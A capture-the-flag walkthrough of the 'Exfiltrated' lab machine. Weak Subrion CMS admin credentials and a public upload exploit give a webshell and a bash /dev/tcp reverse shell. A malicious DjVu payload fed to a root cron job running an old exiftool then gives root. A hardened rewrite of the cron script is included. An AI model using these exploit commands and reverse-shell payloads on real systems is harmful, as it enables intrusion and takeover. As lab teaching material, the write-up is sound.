Exfiltrated - OSPG


Summary

In this writeup, we'll exploit Subrion CMS v4.2.1 to secure the initial foothold. We'll then escalate our privileges through a root cron job that runs a vulnerable version of exiftool against files we control.


Enumeration

Nmap

We'll begin with an nmap scan.

$ sudo nmap --open -sV -A -p- -vv -n -Pn $IP -oN nmap/services.txt
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; 
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 09BDDB30D6AE11E854BFF82ED638542B
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 7 disallowed entries 
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/ 
|_/updates/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://exfiltrated.offsec/

Inspecting the output, the robots.txt entries point to a few interesting directories on the HTTP service.

Browsing each of them, the /panel/ directory redirects us to a login page.

$ curl -s $URL/panel/
<!DOCTYPE html>
<html lang="en" dir="ltr">
    <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=Edge">
        <title>Login :: Powered by Subrion 4.2</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="generator" content="Subrion CMS - Open Source Content Management System">
...

The page is the login panel of Subrion CMS v4.2.1, and it asks for admin credentials.


Exploitation

Subrion Weak Credentials

Let's test a few default credential combinations: admin:admin, admin:password, subrion:subrion and root:toor.

Luckily, the first combination (admin:admin) logs us in and lands us on the Admin Dashboard page.


Subrion v4.2.1 File Upload Bypass to RCE

We can look up public vulnerabilities for this CMS version with searchsploit.

$ searchsploit Subrion 4.2.1
---------------------------------------------------------------- ---------------------
 Exploit Title                                                  |  Path
---------------------------------------------------------------- ---------------------
Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated)   | php/webapps/49876.py
---------------------------------------------------------------- ---------------------

Since the target runs the same Subrion version, we can reasonably assume it is vulnerable to this authenticated RCE.

With the admin credentials already in hand, we can continue mounting our attack by executing the following commands:

$ searchsploit -m php/webapps/49876.py # → Mirror (copy) the exploit script to the current directory.
$ python3 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin # → execute the copied script given URL, admin username and password.
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 

[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: HDUgrsxjx6on2NWuf6kfmKLDxgcfXy7QIDVebkAo
[+] Trying to log in...
[+] Login Successful!

[+] Generating random name for Webshell...
[+] Generated webshell name: tqrdcqpnkrgchnr

[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/tqrdcqpnkrgchnr.phar 

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ bash+-c+%22bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.49.122%2F80+0%3E%261%22 # → call URL-encoded reverse shell

The decoded reverse shell command is the following:

$ bash -c "bash -i >& /dev/tcp/192.168.49.122/80 0>&1"

After the command is executed, our netcat listener on port 80 should receive a connection as www-data.

$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.49.122] from (UNKNOWN) [192.168.122.163] 57592
bash: cannot set terminal process group (973): Inappropriate ioctl for device
bash: no job control in this shell
www-data@exfiltrated:/var/www/html/subrion/uploads$

Privilege Escalation

Crontab Service

Local enumeration reveals an interesting entry in /etc/crontab.

www-data@exfiltrated:/var/www/html/subrion/uploads$ cat /etc/crontab
...
* *     * * *   root    bash /opt/image-exif.sh

The script /opt/image-exif.sh is executed by root every minute.

Let's take a closer look at its contents.

www-data@exfiltrated:/var/www/html/subrion/uploads$ cat /opt/image-exif.sh
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata 

echo -ne "\\n metadata directory cleaned! \\n\\n"


IMAGES='/var/www/html/subrion/uploads'

META='/opt/metadata'
FILE=`openssl rand -hex 5`
LOGFILE="$META/$FILE"

echo -ne "\\n Processing EXIF metadata now... \\n\\n"
ls $IMAGES | grep "jpg" | while read filename; 
do 
    exiftool "$IMAGES/$filename" >> $LOGFILE 
done

echo -ne "\\n\\n Processing is finished! \\n\\n\\n"

In short, the script lists every file in /var/www/html/subrion/uploads whose name contains "jpg" and runs exiftool against it as root, appending the output to a randomly named log file under /opt/metadata. Since the uploads directory is writable by the web application, root ends up parsing attacker-controlled files every minute.
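As an added example from the defender's side (this is not the script from the box, and not part of the original writeup), here is how /opt/image-exif.sh could be rewritten so the cron job refuses to run an ExifTool older than the 12.24 fix, only processes regular files that actually start with the JPEG magic bytes, and drops the fragile ls | grep loop. It assumes exiftool, find, awk, od and timeout are on PATH; the function names, the 12.24 threshold constant and the 10-second timeout are my own choices.

```shell
#!/bin/sh
# Hardened rewrite of /opt/image-exif.sh (added example, not the box's script).
# Assumptions: exiftool, find, awk, od and timeout are on PATH, and the cron
# entry is changed to run this as an unprivileged user instead of root.

IMAGES='/var/www/html/subrion/uploads'
META='/opt/metadata'
MIN_SAFE='12.24'   # first ExifTool release without the DjVu parsing bug

# version_lt A B: exit 0 if major.minor version A is numerically older than B.
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        split(a, x, "."); split(b, y, ".")
        lt = (x[1]+0 < y[1]+0) || (x[1]+0 == y[1]+0 && x[2]+0 < y[2]+0)
        exit !lt
    }'
}

# exiftool_vulnerable VER: exit 0 if VER is older than MIN_SAFE.
exiftool_vulnerable() {
    version_lt "$1" "$MIN_SAFE"
}

# is_jpeg_file PATH: exit 0 only for a regular file starting with the JPEG
# SOI marker FF D8 FF; a renamed DjVu or other file fails this check.
is_jpeg_file() {
    [ -f "$1" ] && [ "$(head -c 3 "$1" | od -An -tx1 | tr -d ' \n')" = "ffd8ff" ]
}

# process_images: the cron job body, gated on the installed ExifTool version.
process_images() {
    ver=$(exiftool -ver 2>/dev/null) || { echo "exiftool not found" >&2; return 1; }
    if exiftool_vulnerable "$ver"; then
        echo "refusing to run: exiftool $ver is older than $MIN_SAFE" >&2
        return 1
    fi
    logfile="$META/$(openssl rand -hex 5)"
    # -maxdepth 1 -type f: only regular files directly in the upload directory,
    # matched by name, instead of parsing ls output for the substring "jpg".
    find "$IMAGES" -maxdepth 1 -type f -name '*.jpg' |
    while IFS= read -r img; do
        is_jpeg_file "$img" || { echo "skipping non-JPEG: $img" >&2; continue; }
        # timeout bounds a hung or looping parser; one failure does not abort the run.
        timeout 10 exiftool "$img" >> "$logfile" || echo "exiftool failed on $img" >&2
    done
}
```

The version gate alone would have stopped the escalation shown in the next section; the magic-byte check and the non-root cron user are defence in depth for the next parser bug.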


Exiftool to RCE

A security researcher recently reported an RCE vulnerability affecting exiftool versions earlier than 12.24.

To check the current exiftool version, we execute:

www-data@exfiltrated:/var/www/html/subrion/uploads$ exiftool -ver
11.x

The installed version is older than 12.24, so the current exiftool is likely exploitable. We can test this by following the public PoC:

On our local machine, we execute:

$ sudo apt-get update && sudo apt-get install -y djvulibre-bin # → Install dependencies
$ cat payload # → Create a payload file with the content is a reverse shell.
(metadata "\c${system('bash -c \"bash -i >& /dev/tcp/192.168.49.63/80 0>&1\"')};")
$ bzz payload payload.bzz # → Compress the payload 
$ djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz # → Compile the exploit.djvu file
$ cat configfile # → Prepare a configfile having the following content.
%Image::ExifTool::UserDefined = (
    # All EXIF tags are added to the Main table, and WriteGroup is used to
    # specify where the tag is written (default is ExifIFD if not specified):
    'Image::ExifTool::Exif::Main' => {
        # Example 1.  EXIF:NewEXIFTag
        0xc51b => {
            Name => 'HasselbladExif',
            Writable => 'string',
            WriteGroup => 'IFD0',
        },
        # add more user-defined EXIF tags here...
    },
);
1; #end%
$ exiftool -config configfile  '-HasselbladExif<=exploit.djvu' sample.jpg # → Embed the payload into the sample.jpg image
$ python3 -m http.server 80 # → Create a http server to transfer the payload

From the www-data shell, we download the sample.jpg image with wget.

www-data@exfiltrated:/var/www/html/subrion/uploads$ wget 192.168.49.63/sample.jpg
Connecting to 192.168.49.63:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4405 (4.3K) [image/jpeg]
Saving to: ‘sample.jpg’

sample.jpg                                         100%[=====================================================================================================================>]   4.30K  --.-KB/s    in 0.03s 

It's important to save the downloaded sample.jpg inside the /var/www/html/subrion/uploads directory, since that is the only directory the cron job scans; then we wait for the next run.

After a minute, we should obtain the reverse shell:

$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.49.63] from (UNKNOWN) [192.168.63.163] 50058
bash: cannot set terminal process group (37008): Inappropriate ioctl for device
bash: no job control in this shell
root@exfiltrated:~# id
id
uid=0(root) gid=0(root) groups=0(root)

and we are root.